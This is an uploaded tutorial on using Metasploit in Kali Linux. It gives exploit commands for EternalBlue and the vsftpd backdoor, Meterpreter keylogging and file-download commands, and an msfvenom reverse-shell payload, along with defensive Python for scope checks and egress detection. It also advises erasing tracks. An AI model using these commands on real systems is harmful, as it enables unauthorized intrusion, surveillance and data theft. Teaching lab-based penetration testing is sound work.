Metasploit Guide

Guide on how to use Metasploit Framework (MSF) in Kali Linux

Uploaded by

sahilborse114

Using Metasploit in Kali Linux: A Detailed Guide

This guide provides step-by-step instructions on how to install, configure, and use Metasploit Framework (MSF) in Kali Linux.
Metasploit is a powerful open-source tool for penetration testing, exploit development, and vulnerability assessment. Kali Linux
comes with Metasploit pre-installed, but we'll cover updates and basic usage.

Note: This guide assumes you are running Kali Linux as root or with sudo privileges. Always use Metasploit ethically and legally,
such as in a controlled lab environment. Unauthorized use can lead to legal consequences.

Prerequisites
Kali Linux installed (virtual machine or physical).
Basic knowledge of Linux terminal commands.
A target machine or virtual environment for testing (e.g., Metasploitable VM).
Ensure your system is up to date:

sudo apt update && sudo apt upgrade -y

Step 1: Install or Update Metasploit


Kali Linux includes Metasploit by default, but it's good to ensure it's updated.

1. Update the package list:

sudo apt update

2. Install or upgrade Metasploit if needed:

sudo apt install metasploit-framework -y

3. Verify installation:

msfconsole --version

This should display the version (e.g., Framework Version: 6.x.x).

Step 2: Configure the PostgreSQL Database


Metasploit uses a PostgreSQL database to store information like hosts, vulnerabilities, and sessions. It's essential for efficient
workflow.
1. Start the PostgreSQL service:

sudo systemctl start postgresql

2. Enable PostgreSQL to start on boot:

sudo systemctl enable postgresql

3. Initialize the Metasploit database:

sudo msfdb init

This creates the database and user if not already set up.

4. Verify the database status:

sudo msfdb status

Step 3: Launch Metasploit Console


The primary interface is msfconsole, a command-line tool.

1. Start Metasploit:

sudo msfconsole

You'll see the MSF banner and prompt: msf6 >

If you encounter database connection issues, run db_status inside msfconsole to check.

Step 4: Basic Commands in Metasploit


Once in msfconsole, use these commands to navigate and operate.

1. Search for Modules: Metasploit has thousands of modules (exploits, auxiliaries, payloads, etc.).

search <keyword>

Example: Search for EternalBlue exploit:

search eternalblue

2. Use a Module: Load a specific module.


use <module_path>

Example:

use exploit/windows/smb/ms17_010_eternalblue

3. Show Information: View details about the loaded module.

info

4. Show Options: Display required and optional settings.

show options

5. Set Options: Configure variables like target IP (RHOSTS) or payload.

set <option> <value>

Examples:

Target IP:

set RHOSTS 192.168.1.100

Your Kali IP for reverse connections:

set LHOST 192.168.1.50

Set a payload:

set PAYLOAD windows/meterpreter/reverse_tcp

6. Show Payloads: List compatible payloads for the exploit.

show payloads

7. Exploit the Target: Run the exploit.

exploit

Or use run for auxiliary modules.

8. Background a Session: If you gain a Meterpreter session, background it to multitask.

background

List sessions:

sessions

Interact with a session:

sessions -i <session_id>

9. Meterpreter Commands (Post-Exploitation): Once in a Meterpreter shell (meterpreter >):

Get system info: sysinfo
Screenshot: screenshot
Keylogger: keyscan_start, then keyscan_dump
Upload file: upload /path/to/local/file /remote/path
Download file: download /remote/path /local/path
Exit: exit

10. Other Useful Commands:

Help: help or ?
Back to previous menu: back
Exit MSF: exit
Update Metasploit database: db_rebuild_cache
Scan for hosts: Use auxiliary modules like use auxiliary/scanner/discovery/udp_sweep

Step 5: Example Workflow: Exploiting a Vulnerable Target

Let's simulate exploiting Metasploitable 2 (a vulnerable VM).

1. Start msfconsole:

sudo msfconsole

2. Search for vsftpd backdoor exploit:

search vsftpd

3. Use the module:

use exploit/unix/ftp/vsftpd_234_backdoor

4. Set options (the target IP, e.g., 192.168.1.101):

set RHOSTS <target_ip>


5. Run the exploit:

exploit

6. If successful, you'll get a shell. Upgrade to Meterpreter if needed.
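
A scope check to run before the set RHOSTS step in Steps 4 and 5, added here as an example (it is not part of the original guide or of Metasploit). The scope and exclusion values and the function name check_rhosts are assumptions; only literal addresses and CIDR blocks are evaluated, and anything else is rejected for manual review.

```python
import ipaddress

# Assumption: the written authorization covers only this lab subnet (constructed value).
AUTHORIZED_SCOPE = ["192.168.1.0/24"]
# Assumption: addresses the rules of engagement exclude even inside that subnet.
EXCLUDED = ["192.168.1.1"]


def check_rhosts(rhosts, scope=AUTHORIZED_SCOPE, excluded=EXCLUDED):
    """Return (allowed, rejected) for a space- or comma-separated RHOSTS value.

    Hostnames, dash ranges and file: references are rejected rather than
    resolved, so a person confirms what they point at first.
    """
    scope_nets = [ipaddress.ip_network(s) for s in scope]
    excluded_nets = [ipaddress.ip_network(e) for e in excluded]
    allowed, rejected = [], []
    for token in rhosts.replace(",", " ").split():
        try:
            # strict=False accepts a host address written with a prefix length.
            net = ipaddress.ip_network(token, strict=False)
        except ValueError:
            rejected.append((token, "not a literal address or CIDR"))
            continue
        in_scope = any(net.version == s.version and net.subnet_of(s)
                       for s in scope_nets)
        hits_excluded = any(net.version == e.version and net.overlaps(e)
                            for e in excluded_nets)
        if not in_scope:
            rejected.append((token, "outside authorized scope"))
        elif hits_excluded:
            rejected.append((token, "overlaps an excluded address"))
        else:
            allowed.append(token)
    return allowed, rejected
```

Only the tokens in the allowed list should be passed to set RHOSTS; every rejected entry carries the reason it was refused.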

Step 6: Advanced Tips


Update Metasploit: Run msfupdate inside msfconsole (or use apt).
Create Custom Payloads: Use msfvenom for standalone payloads. Example: Create a Windows reverse TCP executable:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f exe > payload.exe

Armitage GUI: For a graphical interface, install and run armitage.


Nmap Integration: Run Nmap from MSF:

db_nmap -sV <target_ip>

Troubleshooting:
Database errors: Run msfdb reinit.
Permission issues: Ensure running as root.
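
From the defender's side, the reverse_tcp payload configured with LHOST and LPORT above makes the target open an outbound connection, which egress logs record. The following added example (not from the original guide) flags such connections in constructed iptables LOG lines; the log prefix, the allowed-port list and the function name are assumptions, and it checks against an allowlist rather than only port 4444 because LPORT is configurable.

```python
import re
from collections import defaultdict

# Constructed iptables LOG lines for new outbound connections; not real traffic.
SAMPLE_LOG = """\
Jan 10 10:00:01 fw kernel: EGRESS IN=eth1 OUT=eth0 SRC=192.168.1.100 DST=192.0.2.10 LEN=60 TTL=63 PROTO=TCP SPT=49160 DPT=443 SYN
Jan 10 10:00:05 fw kernel: EGRESS IN=eth1 OUT=eth0 SRC=192.168.1.100 DST=192.168.1.50 LEN=60 TTL=63 PROTO=TCP SPT=49162 DPT=4444 SYN
Jan 10 10:00:06 fw kernel: EGRESS IN=eth1 OUT=eth0 SRC=192.168.1.100 DST=192.168.1.50 LEN=60 TTL=63 PROTO=TCP SPT=49163 DPT=4444 SYN
Jan 10 10:00:09 fw kernel: EGRESS IN=eth1 OUT=eth0 SRC=192.168.1.101 DST=192.0.2.53 LEN=70 TTL=63 PROTO=UDP SPT=40000 DPT=53
Jan 10 10:00:12 fw kernel: EGRESS IN=eth1 OUT=eth0 SRC=192.168.1.101 DST=192.168.1.50 LEN=60 TTL=63 PROTO=TCP SPT=50211 DPT=8443 SYN
"""

# Assumption: the only TCP ports these hosts legitimately open outbound.
ALLOWED_TCP_PORTS = {80, 443}

# KEY=value pairs as they appear in the kernel log line.
KV = re.compile(r"\b([A-Z]+)=(\S+)")


def unexpected_egress(log_text, allowed_ports=ALLOWED_TCP_PORTS):
    """Map each source host to {(dst, dport): count} for TCP SYNs to non-allowed ports."""
    findings = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        fields = dict(KV.findall(line))
        # Only connection attempts matter here: TCP packets carrying the SYN flag.
        if fields.get("PROTO") != "TCP" or "SYN" not in line.split():
            continue
        try:
            dport = int(fields["DPT"])
        except (KeyError, ValueError):
            continue  # malformed or truncated line
        if dport not in allowed_ports:
            key = (fields.get("DST", "?"), dport)
            findings[fields.get("SRC", "?")][key] += 1
    return {src: dict(dsts) for src, dsts in findings.items()}
```

On the sample lines this reports 192.168.1.100 connecting twice to 192.168.1.50 on port 4444 and 192.168.1.101 once on port 8443, while the HTTPS and DNS traffic is ignored.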

Step 7: Cleanup and Exit


Close sessions: sessions -K (all sessions) or sessions -k <session_id> (one session)
Stop services if needed: sudo systemctl stop postgresql
Always erase tracks in real pentests.

Resources
Official Documentation: https://docs.metasploit.com/
Kali Linux Docs: https://www.kali.org/docs/
Practice: Set up Metasploitable VM from Rapid7.

This guide is for educational purposes only.
